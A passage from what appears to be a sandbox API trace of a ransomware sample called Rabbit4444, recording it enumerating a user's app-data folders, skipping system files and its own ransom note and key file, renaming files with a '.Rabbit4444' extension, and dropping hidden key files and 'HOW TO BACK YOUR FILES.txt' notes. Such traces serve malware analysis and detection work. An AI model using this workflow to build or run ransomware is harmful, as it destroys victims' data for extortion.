lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.359] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.359] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="Rabbit4444.exe") returned 1 [0061.359] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".") returned 1 [0061.359] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="..") returned 1 [0061.359] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="windows") returned -1 [0061.359] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="bootmgr") returned 1 [0061.359] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="pagefile.sys") returned 1 [0061.359] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="boot") returned 1 [0061.360] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="ids.txt") returned 1 [0061.360] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="NTUSER.DAT") returned 1 [0061.360] lstrcpyW (in: lpString1=0x130ebdc, lpString2="settings.dat.LOG1" | out: lpString1="settings.dat.LOG1") returned="settings.dat.LOG1" [0061.360] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1", dwFileAttributes=0x22) returned 1 [0061.360] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1", dwFileAttributes=0x6) returned 1 [0061.361] lstrlenW (lpString="settings.dat.LOG1") returned 17 [0061.361] lstrlenW (lpString="Rabbit4444") returned 10 [0061.361] lstrcmpiW (lpString1="s.dat.LOG1", lpString2="Rabbit4444") returned 1 [0061.361] lstrlenW (lpString=".dll") returned 4 [0061.361] lstrcmpiW (lpString1="LOG1", lpString2=".dll") returned 1 [0061.361] lstrlenW (lpString=".lnk") returned 4 [0061.361] lstrcmpiW (lpString1="LOG1", lpString2=".lnk") returned 1 [0061.361] lstrlenW (lpString=".ini") returned 4 [0061.361] lstrcmpiW (lpString1="LOG1", lpString2=".ini") returned 1 [0061.361] lstrlenW (lpString=".sys") returned 4 [0061.361] lstrcmpiW (lpString1="LOG1", lpString2=".sys") returned 1 [0061.361] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\settings\\settings.dat.log1"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0061.361] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0061.361] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15267225337) returned 1 [0061.362] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0061.362] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0061.362] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0061.362] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x29c [0061.363] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0061.364] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123760 [0061.364] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0061.364] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0061.364] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0061.364] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x123760 [0061.364] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0061.364] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0061.364] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0061.364] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15267500271) returned 1 [0061.364] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0061.364] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0061.364] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.365] CloseHandle (hObject=0x29c) returned 1 [0061.365] CloseHandle (hObject=0x2a0) returned 1 [0061.365] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1.Rabbit4444") returned 110 [0061.365] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\settings\\settings.dat.log1"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\settings\\settings.dat.log1.rabbit4444"), dwFlags=0x1) returned 1 [0061.365] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5757cb5f, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x5757cb5f, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x5757cb5f, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0061.365] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.365] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.365] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="Rabbit4444.exe") returned 1 [0061.365] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".") returned 1 [0061.365] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="..") returned 1 [0061.365] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="windows") returned -1 [0061.365] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="bootmgr") returned 1 [0061.365] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="pagefile.sys") returned 1 [0061.366] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="boot") returned 1 [0061.366] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="ids.txt") returned 1 [0061.366] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="NTUSER.DAT") returned 1 [0061.366] lstrcpyW (in: lpString1=0x130ebdc, lpString2="settings.dat.LOG2" | out: lpString1="settings.dat.LOG2") returned="settings.dat.LOG2" [0061.366] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2", dwFileAttributes=0x22) returned 1 [0061.366] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2", dwFileAttributes=0x6) returned 1 [0061.366] lstrlenW (lpString="settings.dat.LOG2") returned 17 [0061.366] lstrlenW (lpString="Rabbit4444") returned 10 [0061.366] lstrcmpiW (lpString1="s.dat.LOG2", lpString2="Rabbit4444") returned 1 [0061.366] lstrlenW (lpString=".dll") returned 4 [0061.366] lstrcmpiW (lpString1="LOG2", lpString2=".dll") returned 1 [0061.366] lstrlenW (lpString=".lnk") returned 4 [0061.366] lstrcmpiW (lpString1="LOG2", lpString2=".lnk") returned 1 [0061.366] lstrlenW (lpString=".ini") returned 4 [0061.366] lstrcmpiW (lpString1="LOG2", lpString2=".ini") returned 1 [0061.366] lstrlenW (lpString=".sys") returned 4 [0061.366] lstrcmpiW (lpString1="LOG2", lpString2=".sys") returned 1 [0061.366] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5757cb5f, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x5757cb5f, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x5757cb5f, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0061.366] FindClose (in: hFindFile=0x102850 | out: hFindFile=0x102850) returned 1 [0061.366] lstrcpyW (in: lpString1=0x130ebdc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.366] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.367] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.367] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.368] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.368] CloseHandle (hObject=0x2a0) returned 1 [0061.368] CloseHandle (hObject=0x27c) returned 1 [0061.368] GetCurrentThreadId () returned 0xd98 [0061.368] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122128 [0061.368] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\RoamingState" [0061.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124198 | out: hHeap=0xe0000) returned 1 [0061.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0061.368] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\RoamingState" [0061.368] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\RoamingState\\" [0061.368] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" [0061.369] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.375] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.377] FlushFileBuffers (hFile=0x27c) returned 1 [0061.378] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.379] CloseHandle (hObject=0x27c) returned 1 [0061.379] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\RoamingState") returned 85 [0061.379] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.379] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabdcd6c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd24fdbad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xede6db27, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102850 [0061.379] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.379] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.379] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.379] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.379] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabdcd6c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd24fdbad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xede6db27, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.379] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.379] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.379] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.379] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.380] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.380] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xede6db27, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xede6db27, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xede93d83, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.380] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.380] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.380] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xede6db27, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xede6db27, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xede93d83, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.380] FindClose (in: hFindFile=0x102850 | out: hFindFile=0x102850) returned 1 [0061.380] lstrcpyW (in: lpString1=0x130ebe4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.380] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.380] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.380] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.381] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.381] CloseHandle (hObject=0x2a0) returned 1 [0061.381] CloseHandle (hObject=0x27c) returned 1 [0061.381] GetCurrentThreadId () returned 0xd98 [0061.381] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1221a8 [0061.381] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalState" [0061.381] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118658 | out: hHeap=0xe0000) returned 1 [0061.381] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221a0 | out: hHeap=0xe0000) returned 1 [0061.381] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalState" [0061.381] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalState\\" [0061.381] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" [0061.381] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.382] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.385] FlushFileBuffers (hFile=0x27c) returned 1 [0061.386] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.386] CloseHandle (hObject=0x27c) returned 1 [0061.386] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalState") returned 83 [0061.386] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.386] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabdcd6c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd24fd7b1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xede93d83, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0061.387] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.387] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.387] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.387] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.387] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabdcd6c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd24fd7b1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xede93d83, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.387] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.387] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.387] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.387] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.387] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.387] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xede93d83, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xede93d83, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xede93d83, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.387] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.387] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.387] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xede93d83, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xede93d83, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xede93d83, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.387] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0061.387] lstrcpyW (in: lpString1=0x130ebe0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.387] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.388] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.388] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.388] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.388] CloseHandle (hObject=0x2a0) returned 1 [0061.388] CloseHandle (hObject=0x27c) returned 1 [0061.388] GetCurrentThreadId () returned 0xd98 [0061.388] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122308 [0061.388] lstrcpynW (in: 